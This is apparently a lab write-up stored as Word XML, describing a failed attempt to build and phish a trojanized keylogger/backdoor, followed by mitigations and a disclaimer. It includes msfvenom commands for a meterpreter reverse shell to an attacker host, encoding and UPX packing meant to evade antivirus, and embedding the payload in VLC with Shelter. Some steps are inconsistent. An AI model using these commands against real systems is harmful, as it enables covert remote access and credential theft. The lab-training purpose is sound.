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E6F7C" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRPr="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B756EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Keylogger Exploit Lab Attempt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D47D165" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRPr="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B756EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lab Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5738F85D" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRPr="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:r w:rsidRPr="00B756EF">
        <w:t>As a penetration tester and ethical hacker, my primary responsibility is to identify vulnerabilities and assess security measures to protect digital assets. In this lab, I attempted to create and deploy a keylogger with a backdoor to achieve persistent access to a target system. However, the exploit was unsuccessful due to robust security measures, including updated operating system patches and an effective antivirus solution. This exercise underscores the importance of maintaining strong cybersecurity defenses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9CFE79" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRPr="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B756EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objectives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DB3703" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRPr="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B756EF">
        <w:t>Understand the process of creating and delivering a keylogger payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DA1367" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRPr="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B756EF">
        <w:t>Analyze the failure points due to effective security mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112741CB" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRPr="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B756EF">
        <w:t>Highlight the role of ethical hacking in improving cybersecurity awareness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A13C763" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRPr="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B756EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Steps Taken</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D4F51C" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRPr="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B756EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 1: Generate the Keylogger Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCC0C57" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:r w:rsidRPr="00B756EF">
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:r w:rsidRPr="00B756EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metasploit Framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00B756EF">
        <w:t>, I generated a payload designed to establish a reverse TCP connection and act as a keylogger.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566F8C75" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF"/>
    <w:p w14:paraId="75E00AF5" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="25A5F05D" w14:textId="2F1157A2" w:rsidR="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -p windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> LHOST=192.168.145.183 LPORT=8888 -f raw -o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payload.bin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2519C887" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF"/>
    <w:p w14:paraId="3B0DC49E" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRPr="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B756EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 2: Encode the Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3CC761" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRPr="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:r w:rsidRPr="00B756EF">
        <w:t>To evade detection, I encoded the payload using the x86/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B756EF">
        <w:t>shikata_ga_nai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B756EF">
        <w:t xml:space="preserve"> encoder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE96BA0" w14:textId="00EA07F9" w:rsidR="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B756EF">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B756EF">
        <w:t xml:space="preserve"> -p windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B756EF">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B756EF">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B756EF">
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B756EF">
        <w:t xml:space="preserve"> LHOST=192.168.145.183 LPORT=8888 -e x86/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B756EF">
        <w:t>shikata_ga_nai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B756EF">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B756EF">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B756EF">
        <w:t xml:space="preserve"> 10 -f raw -o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B756EF">
        <w:t>encoded_payload.bin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="21EBCAA9" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF"/>
    <w:p w14:paraId="6E50C391" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRPr="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B756EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 3: Obfuscate the Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6B7E66" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRPr="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:r w:rsidRPr="00B756EF">
        <w:t xml:space="preserve">I obfuscated the payload using </w:t>
      </w:r>
      <w:r w:rsidRPr="00B756EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UPX</w:t>
      </w:r>
      <w:r w:rsidRPr="00B756EF">
        <w:t xml:space="preserve"> to make it </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B756EF">
        <w:t>more stealthy</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B756EF">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB6801E" w14:textId="29E9C493" w:rsidR="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B756EF">
        <w:t>upx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B756EF">
        <w:t xml:space="preserve"> --best --ultra-brute stealth_payload.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB90087" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF"/>
    <w:p w14:paraId="423F53F2" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRPr="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B756EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 4: Embed the Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12843AA4" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRPr="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:r w:rsidRPr="00B756EF">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:r w:rsidRPr="00B756EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Shelter</w:t>
      </w:r>
      <w:r w:rsidRPr="00B756EF">
        <w:t xml:space="preserve">, I embedded the payload within a legitimate application (e.g., VLC Player) to create a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B756EF">
        <w:t>trojanized</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B756EF">
        <w:t xml:space="preserve"> file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44923F76" w14:textId="08854186" w:rsidR="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:r>
        <w:tab/>
        <w:t>Shelter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BD6DAC" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRPr="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:r w:rsidRPr="00B756EF">
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F25417E" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRPr="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B756EF">
        <w:t>Selected the Portable Executable (PE) target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434E48BA" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRPr="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B756EF">
        <w:t>Enabled stealth mode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D48EC20" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRPr="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B756EF">
        <w:t>Embedded the encoded and obfuscated payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFB46C3" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61975852" w14:textId="184952D4" w:rsidR="00B756EF" w:rsidRPr="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B756EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 5: Deliver the Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062433AF" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRPr="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:r w:rsidRPr="00B756EF">
        <w:t xml:space="preserve">I hosted the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B756EF">
        <w:t>trojanized</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B756EF">
        <w:t xml:space="preserve"> file on a Kali Linux server and used phishing techniques to deliver it to the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DF77A6" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRPr="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B756EF">
        <w:t xml:space="preserve">The target was tricked into downloading and installing the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B756EF">
        <w:t>trojanized</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B756EF">
        <w:t xml:space="preserve"> file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FDE230" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRPr="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B756EF">
        <w:t>Simultaneously, I set up a listener on my attacker system, waiting for a reverse connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E25B92" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EDB1ED6" w14:textId="75D68612" w:rsidR="00B756EF" w:rsidRPr="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B756EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Outcome</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573AB196" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRPr="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:r w:rsidRPr="00B756EF">
        <w:t>The antivirus software on the target system successfully identified and blocked the payload during installation. Additionally, the target operating system's security patches prevented exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BBAA07" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRPr="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B756EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Definitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17767C8D" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRPr="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B756EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Keylogger:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B756EF">
        <w:t xml:space="preserve"> A malicious tool that records keystrokes on a victim’s device, often used to steal sensitive information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3794F4EF" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRPr="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B756EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B756EF">
        <w:t xml:space="preserve"> Malicious code delivered to a target system to execute specific actions, such as establishing a backdoor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688538C8" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRPr="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B756EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Obfuscation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B756EF">
        <w:t xml:space="preserve"> A technique used to make malicious code harder to detect by antivirus software.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E04731" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRPr="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B756EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Social Engineering:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B756EF">
        <w:t xml:space="preserve"> Manipulating individuals to divulge confidential information or perform actions that compromise security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C180A48" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRPr="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B756EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mitigation Strategies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114F19B7" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRPr="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:r w:rsidRPr="00B756EF">
        <w:t>To defend against keylogger and backdoor exploits, organizations should implement the following measures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229A45BE" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRPr="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B756EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Keep Systems Updated:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13724FB6" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRPr="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B756EF">
        <w:t>Regularly install operating system patches and application updates to close security vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2368A9BF" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRPr="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B756EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Robust Antivirus Solutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0144D9CF" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRPr="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B756EF">
        <w:lastRenderedPageBreak/>
        <w:t>Deploy antivirus software with real-time scanning and up-to-date threat signatures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4964905F" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRPr="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B756EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Educate Users:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320372DE" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRPr="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B756EF">
        <w:t>Train employees to recognize phishing attempts and avoid downloading files from untrusted sources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495A723C" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRPr="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B756EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Implement Application Whitelisting:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDD3B7E" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRPr="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B756EF">
        <w:t>Restrict the execution of unauthorized applications on user devices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B40267E" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRPr="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B756EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Enable Behavioral Analysis in Security Tools:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071181D3" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRPr="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B756EF">
        <w:t>Use tools that can detect unusual activity, such as keystroke logging or unauthorized network connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AE2B28" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRPr="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B756EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Deploy Multi-Factor Authentication (MFA):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BA7D84" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRPr="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B756EF">
        <w:t>Add an extra layer of security to sensitive accounts and access points.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6DFE95" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRPr="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B756EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Perform Regular Security Audits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCC547F" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRPr="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B756EF">
        <w:t>Conduct penetration testing and vulnerability assessments to identify and mitigate potential risks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D27915" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRPr="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B756EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lab Disclaimer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367BF8AA" w14:textId="77777777" w:rsidR="00B756EF" w:rsidRDefault="00B756EF" w:rsidP="00B756EF">
      <w:r w:rsidRPr="00B756EF">
        <w:t>This lab was conducted in a secure and controlled environment for educational purposes. The techniques demonstrated here are intended to improve awareness of how attackers exploit vulnerabilities using trojans and social engineering. This information is not intended for unauthorized or malicious activities. Always adhere to ethical hacking principles and obtain proper authorization before engaging in penetration testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1F764D" w14:textId="77777777" w:rsidR="000E34A5" w:rsidRDefault="000E34A5" w:rsidP="00B756EF"/>
    <w:p w14:paraId="74CA54DB" w14:textId="77777777" w:rsidR="000E34A5" w:rsidRPr="00B756EF" w:rsidRDefault="000E34A5" w:rsidP="00B756EF"/>
